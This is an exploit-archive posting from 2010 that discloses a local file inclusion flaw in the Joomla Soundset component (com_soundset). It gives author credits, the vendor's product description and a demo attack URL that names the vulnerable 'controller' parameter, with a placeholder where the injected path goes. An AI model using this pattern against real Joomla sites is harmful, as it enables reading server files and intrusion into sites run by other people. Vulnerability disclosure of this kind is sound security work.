Joomla Soundset Component (com_soundset) LFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Soundset Component (com_soundset) LFI Vulnerability
# Published : 2010-07-10
# Author : Sid3^effects
# Previous Title : Joomla MySMS Component (com_mysms) Upload Vulnerability
# Next Title : Joomla MyHome Component (com_myhome) Blind SQL Injection Vulnerability

Name : Joomla com_soundset LFI Vulnerability
Date : july 10,2010
Critical Level : HIGH
vendor URL :http://www.soundset.at/
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description
Soundset Tutorial is an interactive tutorial component for Joomla 1.5. Soundset Tutorial can be used to run a complex tutorial / How-To / etc. directly inside your Joomla website. Each tutorial is represented by a project. A project is assigned to a certain category, whereas unlimited nested categories are possible. A project consists of one ore more units. Units provide interactive contents and in detail descriptions; i.e. a unit provides video streaming capabilities and up to 6 user-defined files for download. Furthermore this component provides basic support for CB 1.2 (email sending, avatar, profile page), private messaging (UddeIM), project bookmarking, rating, and commenting, as well as file browsing and file maintenance.
#######################################################################################################
Xploit: LFI Vulnerability

DEMO URL : http://server/index.php?option=com_soundset&controller=[LFI]
#######################################################################################################
# 0day no more
# Sid3^effects